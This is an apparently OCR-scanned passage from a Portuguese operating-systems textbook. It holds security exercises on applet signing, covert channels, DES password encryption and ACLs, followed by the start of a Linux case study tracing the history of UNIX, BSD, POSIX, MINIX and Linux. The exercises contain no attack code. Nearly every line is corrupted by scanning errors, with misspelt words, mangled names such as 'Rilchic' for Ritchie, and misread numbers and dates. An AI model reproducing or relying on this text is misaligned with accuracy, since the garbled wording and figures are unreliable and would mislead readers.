lipo dc instruęao dc dcslocamcnto quc esta sendo usado? 
Sc importa, o quc e mdbor? 

43 - Para verificar se urna applct fol assinada por um fomc- 
ccdor confiavel, o forneccdor da applct pode induir um 
certificado assinado por om icrcciro, dc confknęa, que 
detenha oma cliave póblica. Comudo, para ler o certifi- 
cado, o usuario precisa da diave publica desse icrcciro. 
Essa chavc poderia ser (ornccida por urna quarta panc de 
conflanęa — nesse caso, o usuario precisaria dessa chave 
publica. Parecc que nao ha urna maneira de carregar o 
sistema de verificaęao, ainda que exislam visua lizadores 
quc o utilizem. Como isso poderia iimcionar? 

44 . Descreva as ires cara cle risticas qoe fazem da Java u ma 
lingoagem de prograniaęao meIhor do que C na criaęao 
de prógra mas seguros. 

45 * Assuma quc seu sistema esta uiilizando JDK 1,2. Mostre as 
rcgras (semelhantes as da Tabela 9,3) quc scrao utllizadas 
pa ra pcmi i li r q ue u m a app] et do site < www.appletsRus. com> 
fimdone na sua maqoina. Essa applet pode ser copiar 


arqiuvos adicionais do mesmo sile, Ier/csacvcr arquivos 
em fu sr/imp/ę tam be m ler arquivosdc /ttsr/nie/appktdir. 

46 . Escreva um par de próg ram as, em C ou como scripts do 
shcIL para cnviarc recebcrunia mensagem porom canal 
su bil mina r em um sistema UM1X. Dka: um bit de penors- 
sao pode ser visto, mesmo qoe o acesso a om arquivo nao 
seja permitido c o cornando sieep ou a chamada de sistc- 
ma garanta um alraso por um determinado tempo, tempo 
qoe e passado como argumento. Meęa a iaxa de dados 
para um sistema ocioso. Depois cne oma targa artifidal 
iniciando varios pmcessos diferentes em segundo piano e 
entao meęa novaniente a taxa de dados, 

47 . Diversos sistemas UNIX utilizam o algoritmo DES na ci- 
fragem de senhas. Esses sistemas normalnienie aplicani 
DES 25 vezes em urna lin ha para obter a senha cripto- 
grafada, Copie urna impłenieniaęao do DES da Internet 
e escreva um programa que cifi e u ma senha e veriftque 
sc a senha e valida para lal sistema, Gcrc urna lista dc 10 
senhas cifradas utilizando o esquema de proleęao Morris- 
-Thompson. Utilize sal dc 16 bits. 

48 . Imaginc que um sistema utillza ACLs para mant er sua 
matriz de proleęao, Escreva um eon junto de funęóes dc 
gerenciamento quecontroie as ACLsquando (1) um novo 
objęto 6 criado; (2) um objęto e apagado; (3) um novo 
domfnio e criado; {4} um domfnio e apagado; (5) novos 
direitos de acesso (unia combinaęao dc r, w, c x) sao con- 
cedidosa um domfnio para mauipulaęaode um objęto; (6) 
sao removEdos os direitos de acesso de um domfnio para 
mampuiaęao dc um objęto; (7) novos direitos dc acesso 
sao concedidos a md os os domin los para manipulaęao dc 
um objęto; (8) sao removidos os direitos de acesso dc to- 
dos os dominios para manipulaęao dc um objęto. 
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Estudo de caso 1: Linux 


Nos capiuilos ameriores, exarmnainoś principiom abs- 
traęoes, algoritmos e tecnicas dc sisiernas operadonais 
cm geral. Agora e o momento dc analisar a-lguns sistemas 
concrcios para vcr como esses principios sao aplicados no 
inundo reaL Comeęaremos com o Linux, uma variaęao po¬ 
pular do UNIX, que exeaua cm uma ampla varicdadc dc 
compuladores, Ele ć o sistema opcractonal dominantę cm 
estaęóes dc trabalho c servidorc$ dc alto desempenbo, mas 
lambem e osado cm sistemas que abrangem dcsdc note- 
books atć supercomputadores. Muitos principios impor- 
tames de projeto sao ilustrados pelo UNIX. 

Comeęaremos pda historia do UNIX e do Linux e pela 
evolnęao do sistema. Dcpois apresentarcmos uma visao gc- 
ral do Linux H para dar uma idcia dc como de c usado, Essa 
vi$ao geral tera urn valor espccial para os Iciiorcs farniliari- 
zados somente com o Windows, visio que esic praticamcn- 
tc esconde dc sens usuarios todos os detalhes do sistema, 
Embora as iruerfaces graficas possani ser eon forta veis para 
os principiatitcs, clas fomecem pouca (lexibiHdade e ne- 
n hu ma percepęao dc como o sisicma (unciona. 

Dcpois, focalizaremos o cerne desie capitulo; uma 
analise dos processos, de gereneiamento de memória, E/S, 
sistema de arquivos e seguranęa no Limiw Para cada to- 
pico, vamos primeiro discutir os conceitos fundamenta!?, 
em seguida as chamadas de sistema e, fmalniente, a im- 
plementaęao, 

A primeira q u es ta o a levantar e; por quc Linux? O Linux 
e uma variante do UN1X, mas existem muitas ouiras versdes 
e variaęoes do UN 1 X, mduindo Aix, FreeBSD, HP-UX, SCO 
UNIX r System V, Solaris e outras, Felizmente, os principios 
fundamemais e as chamadas de sistema sao basicameme 
os mesmos para todos eles (por prmcfpio de projeto). Alern 
disso, as estrategias gerais de implementaęao, os algoritmos 
c as estruturas de dados sao semclhantes, com algumas 
poucas difcrenęas. Para dar exemplos concrctos, c inelhor 
escollier uma versao c descreve-la dc forma consistcnte. 
Como a maioria dos Iciiorcs po$sivdmente ja viu o Linux, 
utilizaremos essa variaęao como nosso exemplu H Lembre-se, 
eniieianto, de que, exceto pela informaęao sobre implemen¬ 
taęao, a maior parte deste capitulo se aplica a todos os siste¬ 
mas UNIX. Urn grandę niimero de livros sobre como utilizar 
o UNIK ja foi escrito, e ainda exlstem outros sobre os recur- 
sos avaoęados e detalhes internos dos sistemas (Bovet e Ce- 
sali, 2005; Maxwell, 2001; McKusick e Ncville-Ncil, 2004; 
Pale, 2003; Stcvcns e Rago, 2008; Vabalia, 2007). 


10.1 


Historia do U NIX e do Lintnc 


O UNIX c o Linux tem unia historia longa c interes- 
same. Aąuilo ąue comeęou como o projeto favorito de um 
jovcm pcsąuisador (Ken Thompson) tornou-se uma in- 
duslria multimilionaria cnvolvendo umvcrsidades, corpo- 
raęoes multinacionais, govcmos e grupos de padronizaęao 
iniemacionais. Nas pa gin as seguinles, diremos como essa 
historia se desdobroin 


10-1-1 I UNICS 

Nas decadas de 1940 e 19S0, só havia computadores 
pessoais — pelo rnenos se pensarmos que P naquela epoca, a 
mandra normaI dc usar um computador era rcserva-lo por 
um tempo e entao apoderar-se da maąuina toda durantc 
aąuelc period o. Obviamcnte, essas maquinas erani lisica - 
men te imensas, mas somente uma pessoa (o program a dor ) 
podia osada em um dado momento. Qiiando stirgiram os 
sistemas em lote, nos anos 1960, o programador submetia 
uma larefa por meio de cartdes perfurados carregando-os 
para a sala de maąuinas. Quando vartas tarefas ja tinham 
sido montadas, o operador lia todos eles como um iinico 
lote. Em geral levava uma hora ou mais, após a submissao 
da tarefa, ate que a saida fosse gerada. Sob essas circuns- 
tandas, a depuraęao ero umprocesso que consumia tempo, 
pois urna u ni ca Yirgula malposirionada poderia resultarno 
desperdfdo de varias horas do tempo do programador. 

Para comornar aquilo que ąuase todos consideravam 
uma organizaęao insatisfatória e improdutwa, o compar- 
tilhamento de tempo foi inventado no MIT e no Inslitu- 
to Dartmouth. O sistema Dartmouth executava somente 
Basic e, durante pouco tempo, desfmtou de certo sucesso 
comercial a mes de desaparecer, O CTSS — o sistema do 
MIT — era de propósito geral e foi um enormc sucesso en- 
tre a comunidade cientifica, Dentro de pouco tempo, os 
pcsquisadores do MIT juntaram esforęos com o Bell Labs 
e a General Electric (na epoca um fabricame de compin 
tadores) e comeęaram a projetar um sistema de segunda 
geraęao, cha mado MULTICS {Muhiplexed Information and 
Compuiing Se wice — informaęao multiplexada e servięo de 
computaęao), como vimos no Capitulo 1. 

Embora o Bell Labs fosse um dos parceiros fundadores 
do projeto MULTICS, mais tarde o abandonou, ddxando 
um de sens pesquisadores, Ken Thompson, procurarido por 
algo i mer essa me para fazer. Ele, por lim, decidhi escrever 
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por sł próprio um MULTICS mais eimito (em iinguagem 
assembly, dessa vez) em um minicomputador PDP-7 aban- 
donado. Independememente do pequeno tamanho do 
PDP-7, o sistema realmente Fundonava e dava suportc aos 
csforęos dc desenvołvimento dc Thompson. Por causa dis- 
so F outro pesąuisador do Bell Labs, Brian Kernighan, cm 
tom dc brincadrira, cha mon o sistema dc UNICS (Unipkxed 
Information md Computing Ser oko — scrvięo dc computaęao 
c de informaęao imiplexada) t Apesar do trocadilho que 
chamava o sistema de 'Eunutos' por ser um MULTICS cas¬ 
tra do, o nome pegou, embora a ortografia tenha sido pos- 
teriormeme trocada para UNIX. 

10-1-21 UNIX PDP-11 

O irabalho dc Thompson impressionou tamo sous co- 
legas do Bell Labs que, em pouco tempo, dc reccbeu a ade- 
sao dc Dcnnis Kitchlc c, posterionneule, do depanamento 
intciro. Nessa cpoca, ocorreram dots grandes deseń volvi- 
memos. Pr im ci ro, o UNIX foi movido do obsoleto PDP-7 
para o PDP-11 / 20 — bem mais moderno — e, mais larde, para 
o PDP-11/45 e o PDP-11/70. As duas ultimas niaąuinas do¬ 
mina ram o mundo dos minicompuladorcs na maior par- 
te da dceada dc 1970. O PDP- !1/45 c O PDP-11/70 cram 
maąuinas poderosas com grandes memórias ffsieas para 
sua ópoca (256 KB c 2 MB, rcspectivamenie). Alcm dis- 
so H lin barn hardware para protezo da memória, lornando 
possfrel o suportc a mulliplos usuarios ao mesmo tempo. 
Entreianto, cram maąuinas de 16 bits que limiuvam os 
processos individuais a 64 KB dc cspaęo de instruędes e 
64 KB dc espaęo de dados, apesar de di sporem dc muito 
mais memória lisica. 

O segundo desenvolvimenio deu-se na linguagem na 
ąual o UNIX Foi cscrito, Naąude momento, ja estava sc tor- 
nando trabaihoso c nada divcnido prerisar reescrcver o sis- 
tema lodo para cada nova maąuina, dc modo que Thomp¬ 
son decidiu reescrevcr o UNIX cm u ma linguagem de alto 
mvel deseń vo!vida em sen próprio projeto, cha mada B. B 
era urna forma simplificada dc BCPL (por sua vez, urna 
simplificaęao de CPL, que, como a PL/L nunca Funcionou). 
Em virtude da debilidade dc B, principalmente por nao 
dispor dc estru tu ras, cssa lematwa nao Foi bcm-succdida. 
Rilchic en la o projetou uma sucessora para R, (nalural- 
mente) cha mada C, c escreveu urn compilador escclcutc 
para da. Juntos, Thompson e Rilchic reescrevemm o UNIX 
cm C. C foi a linguagem certa no memento certo c que 
passou a do mi nar o mercado desde cmao. 

Em 1974, Rilchic c Thompson publicaram um arligo 
Funda niemal sobre UNIX (Ritchie e Thompson, 1974). Em 
lunęao do irabalho descrito nesse arligo, des recebcram o 
cobięado premio ACM Tu ring (Rilchic, 1984; Thompson, 
1984), Essa publicaęao cslimulou muilas univmidad.es a 
pedir ao Bdl Labs uma cópia do UN.IK. Visto ąuc a compa- 
nhia detentora do Bell Labs, a ATST, era um monopólio re- 
gulamcntado naquela epoca e que nao podia estar no ramo 


de coniputadores, ela nao tinha como ir contra o licencia- 
mento do UN1X para as universidades por uma taxa modesta. 

Em uma das coincidenrias quc muitas vezes definem 
a historia, o PDF-11 era o computador escolhido em ąuase 
todos os depattamentos de ciencia da computaęao das uni- 
yersidades, e os sistemas operacionais que acompanhavam 
o PDP- 11 cram considerados terriveis por professores c es- 
tudantes. O UN1X rapidameme preencheu esse vazio, pois 
era fornccido com o código-fonte completo, de modo que 
as pessoas podiam mexer no código indefinidamente. jNu- 
merosos encontros dentificos foram organizados em tor- 
no do UN1X, com palestramcs renomados cxpondo alguns 
erros obscuros do nudco quc des tinham cnconirado c 
di mina do. John Lions, um professor australiano, cscrcvcu 
um documcnto sobre o código-fonte do UNTX do lipo nor¬ 
malnienie rcservado aos uabalhos dc Chaucer ou Shakcs- 
peare {reimpresso como Lions, 1996). O livro descrcveu a 
Versao ó — assim cha mada por ter sido desenia na scxta 
edięao do Manuał do Programador UNIX, O código-fonte 
tinha 8.200 linhas dc C e 900 linhas em linguagem assem- 
bly. Como resuitado de toda essa ativldade, novas ideias e 
mclhorias para o sistema logo se espalharam. 

Denim dc poucos anos, a Ver$ao 6 foi substitufda pda 
Yersao 7, a primcira versao portaiil do UN-IX (ela exccuiava 
no PDP-11 e no Interdaia 8/32), a ąual tinha, naąuela epo¬ 
ca, 18.800 linhas de C e 2.100 linhas em linguagem assein- 
bly. Toda uma geraęao de esmdantes foi criada com a Ver- 
sao 7, o que contribniu para sua ampliaęao depois que des 
se formaram c foram trabalhar na industria. No meio da 
dccada de 1980, o UN1X era amplamente usado cm mini- 
computadorcs c cstaęocs dc Irabalho dc varios fabricantcs, 
Varias empresas ainda queriam a liccnęa do código-fonte 
para fazer suas próprias versoes do UNIX. Uma ddas era 
um pequenogmpo de desenvolvimcmo chamado Micro¬ 
soft, que comerdalizou a Yersao 7 sob o nome de XEN1X 
duranie varios anos, ale que sens interesses mudaram. 

10-1-31 UNIX portatil 

Agora que o UNIX estava escrito em C, a mjgraęao 
dele para unia nova maquina — processo conhecido como 
porlabtlidade — tornaia-se muito mois facil. A migraęao 
rcquer primeiro escrevcr um compilador C para a nova 
maąuina. Depois, e necessario escrever drivers para os dis- 
posilivos da nova maquina, como terminais, impressoras c 
discos, Embora o código do dnvcr esteja cm C, ck nao pode 
ser movido para outra maąuina, compilado e cxecutado 
ncla porque dois discos nunca lun do nam da mesma ma- 
ncira. Por firn, uma peąuena parte dc código dependente 
de maąuina — como manipuladores dc inierrupęao c ro- 
tinas de gerenciamemo de memória — deve ser reescrita, 
geralmente em linguagem assembly. 

A primcira migraęao aiem do PDP-11 foi para o mini¬ 
computador Interdaia 8/32. Esse exercido dcsvendou um 
grandę nu mero dc suposięoes que o IJ MIK implicitamcnte 
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fazia com relaęao a maąuina na qual ele seria executado, 
como as snposięoes nao mencionadas de que os inteiros usa- 
vam ió bits, os ponteiros tambem usavam 16 biis (impli- 
cando um famanho maximo de 64 KB para os programas) e 
a maąuina tinha exatameiitc tres registradores dispomveis 
para contcr as variavcis importantcs, Neiihuma dclas era 
verdadcira para o (nlcrdata, dc modo quc foi nccessario 
um trabalho consideravcl para limpar o UNIK. 

Apesar do fato de que o compilador de Ritdiie era 
rapido e produzia um bom código-obje to, outro próbie- 
ma era que ele produzia sonieme código-objęto para o 
PDP-11. Em vcz de cscrevcr um novo compilador esperi- 
ficamente para o Interdata, Stevc Johnson, do Bell Labs, 
projetou c implcmcntou o compilador C portatil, que 
podia ser redirecionado para produzir código para ąlial- 
quer maąuina com apenas urna ąuamidade moderada 
de esforęo. Dura me anos, qua$e todos os compiladores C 
para maquinas difereines do PDP-11 se basearam no com¬ 
pilador de Johnson, o qual ajudou muito na expansao do 
UNiX para novos computadores. 

Inirialmente, a portabilidade do UNJX para o Interdata 
caminhava lentamente porąue todo o trabalho dc deseńvol- 
vimento tinha de ser feilo na unica maąuina que trabalhava 
com o UNIX — mn PDP-11 localizado no quinto andar do 
Bell Labs. O interdata estava no primeiro andar. A geraęao 
de cada nova versao implicava com pila-la no quinio andar 
e depois carrega-la em unia fita magnetica ate o priniei- 
ro andar para testar o fimcionamento. Após varios meses 
transport a lido fitas, um desconhecido disse: "Nos somos dc 
unia companhia tclefonica. Sera quc nao conseguimos ligar 
cssas duas maąuinas com um fio? r . E assim nasccu a redc 
UNIK, Após ter sido transportado para o Interdata, o UNIX 
migrou tambem para o VAX e outros computadores, 

Após ter sido dissolvida em 1984 pdo governo dos Es- 
tados Unidos, a AT&T foi legał mente libera da para ativar 
urna subsidiaria de computadores c assim o fez. Logo em 
seguida, cla lanęou seu primeiro produto UNIX comcrcial, 
o System lii. Como nao foi bem recebido, foi substitufdo 
por u ma vcrsao mdhorada, o System V, urn ano depois. 
O que acoiiteceu com o System IV e um dos grandes mis- 
terios nao resolvidos da dencia da computaęao, O System 
V tern sido, desde entao, substiimdo pelas versoes 2, 3 e 
4, cada u ma maior e mais complexa do que sua anterior. 
Nesse proces&o, a ideia original por tras do UN1X — de 
ter um sistema simples e superior — gradualmente foi 
perdendo foręa. Embora o grupo de Ritdiie e Thompson 
tenha produzido posteriormeme as edięoes 8, 9 e 10 do 
UN1X, elas mm ca foram amplamcntc circuladas, pois a 
AT&T colocou toda a sua foręa dc marketing no System 
V, Coiitudo, aigumas das idcias das ediędes 8, 9 c 10 foram, 
por lim, incorporadas no System V, A AT&T finał mente dc- 
cidiu ser unia companhia de corminicaęóes, e nao mais de 
computadores, e assim vendeu seus negócios de UNIX para 
a Noveil em 1993. A Newell, por sua vez, vendeu para a 
Santa Cruz Operation em 1995. Depois de ludo isso, era 


quase irrelevame saber quem era o proprietario do UNiX, 
visto que todas as maiores companhias de computadores 
ja tinliam suas próprias liccnęas. 

10-1-41 UNIX de Berkeley 

Uma das maiores universidades que adąuiriram a Ver- 
sao ć do UN1X antecipada mente foi a Universidade da Cali- 
fórnia, em Berkeley. Como o código-fonie estava disponwel, 
Berkeley foi capaz de modificar o sistema substancialmen- 
te. Aimliada pdos finandamentos da Agenda de Proje- 
tos de Fesąuisas Avanęadas (Advanccd Research Frojects 
Agertcy — A RPA) do Departament o de Defesa dos Es ta dos 
Unidos, Berkeley produziu e lanęou urna versao mdhorada 
para o POP-11, chama da de 1BSD [First Berkeley 1 Software Dis- 
tribution— Primeira distribuięao de software de Berkeley), 
seguida rapidamente pdo 2BSD, lambem para o PDP-11. 

O mais importante foi o 3BSD e especialmente seu su- 
cessor, o 4 BSD, para o VAX, Embora a AT5T tivesse urna 
versao VAX do UNIX, chamada 32V, ela era essencialmen¬ 
te a Versao 7. Em contrasie, o sistema 4BSD cominha um 
grandę numero de melhorias. A prindpal delas foi o uso de 
memória virtual e paginaęao, que permitiu a execuęao 
de programas maiores do que a memória hsica a partir da 
paginaęao de suas partes para dentro c fora da memória, 
conlormc neccssario. Outra mudanęa permitiu que os no- 
mes dos arquivos comivessem mais do que 14 caracteres. 
A implcinentaęao do sistema dc arquivos tambem foi in- 
crementada, deixando-o consideravelmeme mais rapido. O 
tratamento de sinais ficou mais confiavel. Foi introduzido o 
uso de red es, o que permitiu que o protocolo de redes mi¬ 
lsza do, o TCP/IP, sc tornasse um padrao de facto no niundo 
UNIX e posteriormente na Internet, que e dominada por 
semdores com hase no UNix. 

Berkeley tambem incorporou um numero substandal 
dc programas utilitarios para o UNIX, incluindo um novo 
ediior {vi) f um novo sliell {csk) f os compiladores Pascal e Lisp 
e muito mais. Todas essas melhorias fizeram com que a Sun 
Microsystems, a DEC e outros vendcdoresde computadores 
baseassem suas versóes do UNIX no UNIX de Berkeley, em 
vez de na vcrsao 'ofidaP da AT&T — o System V. Consc- 
ąuentemente, o UNIK de Berkeley estabdeceu-se nas areas 
acadcmica, dc pesquisa c de defesa. Para mais inlormaęocs 
sobre o UNTX de Berkeley, veja McKusick et ał. (1996). 

10-1-51 UNIX-padrao 

No finał da decada de i980, duas diferentes e, de certo 
modo, incompaifveis versoes do UNIX eram amplameme 
usadas: a 4.3BSD e o System V Release 3, Alem disso, 
cada fabricante inclufa seus próprios aprimoramentos 
nao padronizados. Essa divisao no mundo UNIK, somada 
ao fato de que nao existiam padroes para os formatos dos 
programas binarios, inibiu basu mc o sucesso comcrdal 
do UNIX, porque era impossfvel para os vendedores de 
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software escrewr e empacotar programas UNIK com a es¬ 
peranta cle que eles fossem execmados em qualquer siste- 
ma UN1X (como normalnienie era feito com o MS-DOS). 
Varias tentaiwas de padronizaęao do UN1X fal ha ram ini- 
cialrnente, A ATfrT, por exemplo, lanęon a SV!D (System 

V interface Defimtion — defmięao de interface do System 
V) r que de Pinia lodas as chamadas dc sistema, formatos 
dc arquivos e assim por diante. Hssc documcnio era u ma 
tema li va de manier todos os vendedores do System V ali- 
nhados, mas nao tinha nenhum efeito no campo immigo 
(BSD) r que simplesmente o ignorava. 

A primeira ten tatka seria de reconriliar os dois 'sa- 
borcs' de UNIK Poi inidada sob os auspidos da Comissao 
de Padroes do IEEE, unia cąuipe altameme respdtada e, o 
mak importanle, neutra. Centenas de pessoas dos setores 
indtistrial, academico e govemamental tiveram participa- 
ęao nesse trabalho. O nome coletivo para esse projeto foi 
POSIX. As primeiras tres leiras referem-se a sbtema ope- 
radonal portali] {portalle operatin# system), 0 IX foi adicio- 
nado para deixar o nome parecido com o do UNIX, 

Após muita argumentaęao e contra-a rgiimeniaęao, coe- 
rencia e ineoerenda, o comite POSiX produziu um padrao 
conhccido como 1003 X quc definc um eon junto de proce- 
dimentos de biblioteca que cada sistema UNIK, em confor- 
midadc com o padrao, devc suprir, A maioria desses proccdi- 
mentos cvoca unia cbamada de sistema, mas alguns podem 
ser implenientados fora do nu dc o, Procedimentos Lipicos 
sao open f read e forL O objelivo do POSIK c permiiir ao ven- 
dedor de software que escreve um pr ogra ma u san do sonie n- 
te os procedimentos definidos pelo 1003,1 saber que esse 
programa vai executar em todo sistema UNIX conformatwo. 

Enąuanto e verdade que a maioria dos gmpos de pa- 
dronizaęao lende a produzir um compromisso tcrrwel com 
algumas das caractensticas preferidas de lodos, o 1003.1 e 
extraordmaria menie bom, considerando o grandę nuniero 
de parceiros envolvidos e suas respectwas influencias. Em 
vcz dc usar □ uniao de lodas as cara et erb lica s do System 

V e do BSD como ponto de part i da (a norma para a maio¬ 
ria dos grupos de padronizaęao), o co mi te da IEEE usou a 
intenecęao, Grossa modo , se unia ca ractenst i ca eslava pre- 
sente em ambos — System V e BSD —> da era incluida 
no padrao; caso contra rio, nao era. Em consequcncia desse 
algoritmo, o 1003.1 ficou multa parecido com o ancestral 
do System V e do BSD, on seja, a Yersao 7. O documento 
1003,1 e escrito dc maneira que tanto os implementadores 
de sistemas operadonais quanto os escritores de softwares 
possani co.mpreende-.lo— unia novidade no rnundo da pa- 
dronizaęao, embora ja cxista algo a caminho para remediar 
cssa situaęao, 

Embora o padrao 1003.1 irwista somente nas chama- 
das de sistema, outros documentos rei a do na dos padrani - 
zam threads, programas utilitarios, redes c muiias outras 
caractensticas do UNIK. Alem disso, a iinguagcm C tam- 
bem leni sido pad roni za da pela ANSI e ISO, 


10-1 Jl NilNiK 

Uma propriedade comum a lodos os sistemas UXIX 
modern os e que eles sao grand es e compiicados e, em ccr- 
to sen lido, isso e a antitese da ideia original assodada ao 
UNIK* Aiuda que os códigos-fonte fossem disponibiiizados 
livrcmemc — o que nao ocorre na maioria dos casos — r 
esla fora de cogitacao qnc uma unica pessoa pudesse com- 
preendć-ios loiaimeme* Essa situaęao lcvou o autor desie 
3.ivro a escrever um novo sistema do tipo UNIK quc fosse 
peąueno o suficiente para ser compreendido, que estives- 
se di sporu vel com todo o código-fonie e que pudesse se r 
usado para propósitos educacionais. Esse sistema consisliu 
de 11.800 imhas de código C c 800 linhas dc código assem- 
bly. Ele foi lanęado em 1987 e fimdonalmcnie era quase 
equivalenlc ao UNIX Ycrsao 7 — o sustcntacuio priiidpal 
da maioria dos departament os de dencia da computaęao 
durante a era do PDP-1 L 

O MI NIK Fol um dos primeiros sistemas do lipo UNIK 
baseado no projeto de um micronucleo. A ideia associada 
ao micronucleo visa oferecer futicionalidade minima no 
nucleo para Lorna-lo confiavel e efkienle. Conscąuente- 
mente, o gercndamenlo de memórta e o sistema de arqtii- 
vos fora ni dolega dos aos processos do usuario. O n ucleo 
tratava troca dc mensagens entre os processos c outras 
poticas coisas. O nucleo linha 1,600 linhas de C e 800 li- 
nhas de código cm linguagem assembly. Por razoes lecnicas 
rclacionadas a arquitaura 8088, os dnvers dos dispositi- 
vos de EfS (2.900 linhas adidonais de C) lambem estavam 
no nucleo. O sistema de arquivos (5,100 linhas de C) e o 
gerenciador de memória (2.200 linhas de C) execmavam 
separa da menie como dois processos do usuario. 

Microniicleos lem vantagcns sobre os sistemas monolf- 
ijcoś por serem faceis de compreender e manier cm viriude 
de suas esiruiuras altameme modulares, AJem disso, a mi- 
graęao dc código do modo nucleo para o modo usuario per¬ 
mie que elessejam aliamerue confiaveis porąue a quebra 
de urn processo no modo usuario causa me nos prejufeo do 
quea quebra de um componente no modo nucleo. A prin- 
cipal desvantagem que eles apresentam e um desempenho 
ligeiramenle inferior em decorrencia das trocas extras entre 
o modo usuario e o modo nucleo. Com udo, desempenho 
nao e tu do: todos os sistemas U NIK modernos exccutam 
X Windows no modo usuario e simpiesmeme aceilam a 
qucda do desempenho para obter maior modularidadc (em 
coniraste ao Windows, em quc toda a intcrface gratka do 
usuario — GUI [Graphkal UserInterfoce) — esta no nucleo), 
Outros projeios bem conhecidos de micronucleo dessa era 
foram o Mach (Accetta et al, 1986) e o Chorus (Rozier et 
a)., 198 8). 

Foueos rneses após sua aparięao, o MIMX tornou-se 
em parte um elemento culluado, com sen própoo grupo de 
discussao USENET (hoje em dia, Google) — compMonimx — 
e mais dc 40 mil ustiarios. Muitos deles contribuiram com 
comandos e outros programas de usuario, de modo que 
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o MIN1X tomou-se um empreendimento coletivo man- 
tido por um grandę numero de usuarios pela Internet. 
Em 1997, a Versao 2.0 do MIN1X foi li bera da e o sistema 
basico, incluindo conexao em redes, cresceu para 62.200 
linhas de código. 

Em 2004, o diredonamento do desenvolvńnento do 
MINIX mudon radiealmente e o loco voltou-se para a com- 
trtięao de um sistema extreinamente confiaveL que pudesse 
reparar suas próprias falhas automaticamente e que, assim, 
se tornasse autorreparador, cominuando a fundonar cor- 
retamente mesmo na ocorrencia de repetidos crros de soft¬ 
ware. Em conscqućnda disso, a ideia dc modularizaęao pre- 
scnlc na Vcrsao 1 foi ampliada no MtNIX 3,0, no qaal quase 
todos os drivers dc dispositivo foram movidospara o cspaęo 
do usuario com cada driver funciortando como um proces- 
so sępa rado. O tamanho dci nudeo diminuiu radiealmente 
para menos do que ąuatro mil linhas de código, algo que 
um programador pode compreender facilmeme. Os meca- 
nismos internos foram modificados de forma a maximizar a 
tolerancia a falhas de diversas formas. 

Alem disso, mais dc 500 programas populares para 
UNIX passaram a fundonar tambem no MINIX 3,0, in- 
duindo o Sistema X Windo w (as ve7.es cha mado sim- 
plesmente de X), dwersos compiladores (indusive o $cc), 
editores de texto, programas para redes de compmadores, 
navegadores e muito mais. Ao contrario das versoes ame- 
riores, cuja natureza era inicialmente educadonal, a par- 
tir da versao 3.0 o lM1NIX tornou-se um sistema bastante 
utilizavei e com foco voitado para a alta conftabilidade. O 
objetivo finał e: nada mais dc botoes Rcsct. 

Surgiu urna terceira edięao do livro, descrevendo o novo 
sistema e lornecendo seu código-fonte em nm apendice que 
tambem o descrevia em detalhes (Tanenbaum e WoodhulL 
2006). O sistema continua a evoluire conta com urna comu- 
nidade ativa de usuarios. Para mais detalhes e cópias gra tui- 
tas das vcrsóes mais atuais, visite <www.minix3.org>. 

10-1-71 Linux 

Durante os primeiros a nos dc deseń volvimento do Mb 
N1X c discussocs na Internet, muitas pcssoas rcquisitaram 
(on, em muitos casos, exigiram) mais e melhores caractc- 
nsticas, para as quais o autor muitas veże$ disse 'Nao' (para 
manier o sistema peąueno o sufi cienie para os estudantes 
compreenderem-no completameme em um curso univer- 
sitario de um semestre), Esse 'Nao' contmuo irritou muitos 
usuarios. Naquela epoca, o FreeBSD nao estava disponiyel, 
de modo que nao havia outra opęao. Após variosanos, um 
estudante finlandes diamado Linus Torvalds dcctdiu escre- 
ver um outro clone do UNIX, diamado Linux, que seria um 
sistema de produęao completo, com muitas ca racterfst i ca s 
que fallavam (inicialmente) no MINIX. A primeira vcrsao 
do Linux, 0.01, foi liberada em 1991. Ela foi desenvo!vida 
de modo cm za do (aoss-dewfoped) em u ma maąuina MINIX, 
uiilizando algumas de suas ideias, que lam desde a estrutu- 


ra de angorę da fonie ate o layout do sistema de arquivos. 
Comudo, era um projcio monolilico cm vcż de micronu- 
deo, com o sistema operacional todo no mieleń. O ta ma¬ 
nilo do código totalizava 9.300 linhas de C e 950 linhas em 
łinguagem asscmbly — tamanho aproximadamente similar 
a versao do M1NIX e firn clona li da des tambem aproximada- 
mentc pareddas. Na verdade, era urna reescritura do M1NIX, 
o unito sistema dc cujo código-fontc Torvalds dispunha, 

O Limtx crcsccu rapidamemc de tamanho e evo)mu 
para um completo clone UNIX de produęao quando a me- 
mória virmal, um sistema de arquivos mais sofisticado e 
muitas out ras caractcristicas Ihc foram adicionados. Em- 
bora ele originalmente executasse no 386 (e ainda tivesse 
embutldo o código em łinguagem assembly do 386 embu- 
tido no meio dc scus procedimcntos em C), era totalmen¬ 
ie portatil para outras piata formas e auialmente executa 
em urna ampla variedade dc maquinas, assim como faz o 
UNIX, No eman to, unia cliferenęa em relaęao a o UNIX se 
sobressai: o Linux faz uso de muitas caractcristicas espedais 
do compilador $a c precisaria dc muito trabaiho antes de 
ser capa z dc compilar com um compilador C padrao ANSL 
O maior lanęamemo seguinte do Linux foi a versao 
]*0, em 1994. Ela tinha em torno de 165 mil linhas de 
código, incluindo um novo sistema de arquivos r arquivos 
mapcados cm memória c concxao dc redc compalfvcl com 
o BSD usando soquetes e TCP/IP. Ela tambem induiu mth- 
tos novos drivers de disposilivo. Varias pequenas revisóes 
ocorreram nos dois a nos seguimes, 

Naąuele momento, o Linux era suficicntcmcntc com- 
pattvel com o UNfX, e urna vasta quantidatk de softwares 
do UMX foi transponada para ele, Lornando-o muito mais 
util do que de teria sido sc isso nao livcsse ocorrido, Alem 
disso, muitas pessoas foram atrafdas para o Limix e come- 
ęaram a trabalhar com scu código, estendendo-o dc muitas 
mandras sob a superman geral de Ton alds. 

O maior lanęamcnto depois disso, a versao 2.0, ocor- 
reu cm 1996. Essa versao possufa ccrca dc 470 mil linhas 
dc C e oito mil linhas de código em łinguagem assembly. 
Ela induiu su porte para arquitemras dc 64 bits, multipro- 
gramaęao simetrica, novos protocolos de redes c iniimeras 
outras caractcristicas. Unia cxtcnsa parcela do código total 
foi ocupada por uma grandę quanlidade dc drivcrs dc dis- 
positivtx Outras versoes continua ram surgirukn 

As identiiicaęóes das vcrsocs do nudeo do Linux sao 
forma das por quatro numeros, A.BaZ.D, como 2.6.9. 1 1. O 
primeiro numero identifica a versao do nudeo. O segundo 
numero refere-se a revisocs im port antes. Antes do micleo 
2,6 r as rcvisoes identifica das por numeros pares correspon- 
dem a distribuięóes estaveis do nudeo, enąuanto as iden- 
ttficadas por numeros fmpares correspondem a versóes 
instavcis ainda cm dcscnvolvimcnto. A partir do micleo 
2.6, cssa padronizaęao dcixou dc ser seguida. O terceiro 
numero corresponde a revisoes minimas, como a indu sao 
de su porte a novos dispositivos. O qttarto numero refere-se 
